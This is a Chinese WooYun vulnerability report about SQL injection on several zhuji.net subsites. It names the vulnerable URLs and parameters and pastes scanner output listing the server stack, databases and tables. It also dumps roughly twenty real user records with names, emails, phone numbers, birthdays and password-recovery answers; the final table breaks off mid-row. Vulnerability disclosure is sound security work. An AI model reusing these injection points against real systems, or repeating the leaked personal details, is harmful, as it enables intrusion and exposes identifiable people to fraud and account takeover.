漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0140216
漏洞标题:诸暨在线多个分站存在SQL注入漏洞(涉及20w用户信息)
相关厂商:诸暨在线
漏洞作者: 憋屈
提交时间:2015-09-10 16:18
修复时间:2015-10-25 16:20
公开时间:2015-10-25 16:20
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-09-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-25: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
格式有点乱,,调整半天都不行,先提交了,,,老板一直盯着
详细说明:
http://house.zhuji.net/rentlb.asp?community= 诸暨房产网
http://xywy.zhuji.net/yszs/expert_online.php?type=data&uid=8535076&online=0&toa=1 诸暨寻医网
http://hmc.zhuji.net/cnews.aspx?classid= 诸暨汽车网
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
available databases [13]:
[*] B2C
[*] master
[*] model
[*] msdb
[*] pearl
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] tuangou
[*] xd
[*] zhujifriend
[*] zhujionline
[*] zjtogo
漏洞证明:
Database: zhujionline
[173 tables]
+-------------------+
| Admin |
| BBS_Reply |
| House_qtcs |
| House_qtqg |
| House_zfcs |
| House_zfqg |
| LOVE |
| TB_Catalog |
| TB_Catalog_SWJ |
| TB_Channel |
| TB_Friend_Letter |
| TB_Letter |
| TB_Letter_SH |
| TB_Life |
| TB_Lifebook |
| TB_Normal_SH |
| TB_Normal_SH_CP |
| TB_Normal_SWJ |
| TB_Normal_Shop |
| TB_Normal_ZJKX |
| TB_Rs_Fabu |
| TB_Rs_Sort |
| TB_SH_cpxl |
| TB_Student |
| TB_Txl_Letter |
| TB_Txl_Photo |
| TB_Txl_User |
| TB_User |
| TB_User_Letter |
| TB_Wenxue_Fabiao |
| TB_Wenxue_Pinglun |
| TB_hk_Letter |
| TB_hk_Normal |
| TB_normal |
| Tb_Rs_book |
| Tb_TXl_City |
| Tb_User_En |
| Tb_User_ls |
| Tb_ls_sws |
| Template |
| ?? |
| ?? |
| ?? |
| admin_12 |
| advert |
| advertCategory |
| badmin |
| banknews |
| bmclass |
| bmnews |
| busen |
| car |
| car2 |
| carart |
| carcs |
| cardply |
| carly |
| carnews |
| carnewsclass |
| carsort |
| cclass |
| cclass2 |
| companycpxl |
| companydlxx |
| companyfcly |
| companygqsj |
| companyhzxx |
| companyjgxx |
| companynews |
| companysdly |
| companywdcp |
| companywdkh |
| corpclass |
| corpdata |
| corply |
| corporation |
| corpsd |
| csclass |
| csclass2 |
| cuser |
| descrip |
| dtproperties |
| feedback |
| gadmin |
| house_cf |
| house_qtcz |
| house_qtqz |
| house_tdcs |
| house_zfcz |
| house_zfqz |
| housely |
| housenews |
| housenewsclass |
| hz |
| hzclass |
| hzly |
| information |
| job |
| juser |
| jzclass |
| jzclass2 |
| jzly |
| jzproduct |
| jzsort |
| jztg |
| lawnews |
| lifeclass |
| lifeclass2 |
| lifely |
| lifepic |
| lifeproduct |
| lifesort |
| lifetj |
| lifetjclass |
| lifeuser |
| lpjd |
| lply |
| lptp |
| lpxx |
| ltly |
| market |
| marketclass |
| marketly |
| marketproduct |
| marketsort |
| mobile |
| mobilenews |
| mobilenewsclass |
| mobilesort |
| mobileyear |
| newsly |
| qclass |
| qq |
| qxfb |
| roderphone |
| rs |
| rsclass |
| rsly |
| shangqing |
| sjal |
| suser |
| sx |
| sxclass |
| sxclass2 |
| sxsort |
| systemc |
| sytj |
| sytjclass |
| tel |
| usedcar |
| useddpc |
| usedmoto |
| wd |
| wunit |
| wuser |
| wx |
| wxclass |
| wxly |
| wzp |
| xiaohua |
| xiaolu |
| zadmin |
| zhujigjc |
| zhujikc |
| zhujinews |
| zhujinewsclass |
| ztw |
| ztwclass |
| zx |
| zxclass |
| zxly |
| zxw |
| zxzb |
+-------------------+
Database: zhujionline
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| dbo.TB_User | 197927 |
User_ID | User_Modidatetime | vip | mygrade | viptype | User_Sex | User_Type | User_Name | User_Email | User_Accout | User_PenName | User_Birthday | User_Telephone | User_LoginDate | User_Updatetime | User_LoginCount | User_PasswordResult | User_PasswordProblem |
+---------+--------------------+------+---------+---------+----------+----------------+-------------------------------------------------------------------------+------------------------------------------------------------------+------------------------------------------------------------------+--------------+--------------------+------------------------------------------------------------------+----------------+--------------------+-----------------+----------------------------------+----------------------------------+
| 10 | NULL | NULL | 100 | NULL | NULL | 个人 | NULL | 5656 | 565656 | NULL | NULL | NULL | NULL | 04 13 2003 12:00AM | NULL | 5656 | 5656 |
| 100 | NULL | NULL | 100 | NULL | NULL | 个人 | NULL | [email protected] | 赵将军 | NULL | NULL | NULL | NULL | 04 14 2003 12:00AM | NULL | 2 | 1+1= |
| 1000 | NULL | NULL | 100 | NULL | 女 | 个人 | 程\\?95\\?46 | [email protected] | d123456 | NULL | 10 8 1981 12:00AM | 0575--7027700(下午) | NULL | 04 21 2003 12:00AM | NULL | NULL | NULL |
| 10000 | 03 3 2006 3:11PM | NULL | 100 | NULL | 女 | 个人 | 蔡铁英 | [email protected] | 蔡铁英 | NULL | 03 6 1980 12:00AM | 13777303665 | NULL | 08 14 2003 12:00AM | NULL | 7831673 | 电话 |
| 100000 | 02 6 2007 11:16AM | 0 | 100 | NULL | NULL | 个人 | NULL | NULL | 会员 | NULL | NULL | NULL | NULL | 02 6 2007 12:00AM | NULL | NULL | NULL |
| 100001 | 02 6 2007 11:47AM | 0 | 100 | NULL | NULL | 企业 | NULL | NULL | 诸青藤阁宾馆 | NULL | NULL | 0575―7381155,7206280 | NULL | 02 6 2007 12:00AM | NULL | NULL | NULL |
| 100002 | 02 6 2007 11:48AM | 0 | 100 | NULL | NULL | 个人 | hdyudd | [email protected] | hdyudd | NULL | NULL | NULL | NULL | 02 6 2007 12:00AM | NULL | 467367 | hdyudd |
| 100003 | 02 6 2007 11:52AM | 0 | 100 | NULL | 男 | 个人 | 小黄 | | hjz00001 | NULL | 06 19 1974 12:00AM | 13758588321 | NULL | 02 6 2007 12:00AM | NULL | NULL | NULL |
| 100004 | 02 6 2007 12:01PM | 0 | 100 | NULL | NULL | 个人 | 紫水晶 | NULL | 张敏燕 | NULL | NULL | NULL | NULL | 02 6 2007 12:00AM | NULL | 生日 | NULL |
| 100005 | 02 6 2007 12:10PM | 0 | 100 | NULL | NULL | 个人 | ufy | [email protected] | zbzywb | NULL | NULL | NULL | NULL | 02 6 2007 12:00AM | NULL | 123450 | 123450 |
| 100006 | 02 6 2007 12:26PM | 0 | 100 | NULL | NULL | 个人 | NULL | NULL | zhujibbs | NULL | NULL | NULL | NULL | 02 6 2007 12:00AM | NULL | NULL | NULL |
| 100008 | 02 7 2007 11:16AM | 0 | 100 | 0 | NULL | 企业 | NULL | [email protected] | martinxu | NULL | NULL | 13818212928 | NULL | 02 6 2007 12:00AM | NULL | NULL | NULL |
| 100009 | 02 6 2007 1:21PM | 0 | 100 | NULL | NULL | 个人 | fw | NULL | fw | NULL | NULL | NULL | NULL | 02 6 2007 12:00AM | NULL | NULL | NULL |
| 10001 | 08 14 2003 1:01PM | NULL | 100 | NULL | NULL | 个人 | NULL | NULL | qq男子汉 | NULL | NULL | NULL | NULL | 08 14 2003 12:00AM | NULL | 1213 | 1213 |
| 100010 | 02 6 2007 1:28PM | 0 | 100 | NULL | NULL | 个人 | ree | NULL | ree | NULL | NULL | NULL | NULL | 02 6 2007 12:00AM | NULL | NULL | NULL |
| 100011 | 02 6 2007 1:33PM | 0 | 100 | NULL | NULL | 企业 | NULL | NULL | tkgx | NULL | NULL | 56835310 | NULL | 02 6 2007 12:00AM | NULL | NULL | NULL |
| 100012 | 02 6 2007 1:36PM | 0 | 100 | NULL | NULL | 个人 | 行哈行 | [email protected] | youonlyyou | NULL | NULL | NULL | NULL | 02 6 2007 12:00AM | NULL | nokia3230 | 你的手机型号 |
| 100013 | 03 5 2007 8:51AM | 0 | 100 | NULL | NULL | 企业 | NULL | [email protected] | 捷世凯制衣有限公司 | NULL | NULL | 0575-7387168 7880518 | NULL | 02 6 2007 12:00AM | NULL | NULL | NULL |
| 100014 | 02 6 2007 1:59PM | 0 | 100 | NULL | NULL | 个人 | NULL | NULL | 374098821 | NULL | NULL | NULL | NULL | 02 6 2007 12:00AM | NULL | NULL | NULL |
| 100015 | 02 6 2007 2:05PM | 0 | 100 | NULL | NULL | 个人 | NULL | NULL | 维生素B | NULL | NULL | NULL | NULL | 02 6 2007 12:00AM | NULL | NULL | NULL |
+---------+-------------
修复方案:
版权声明:转载请注明来源 憋屈@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝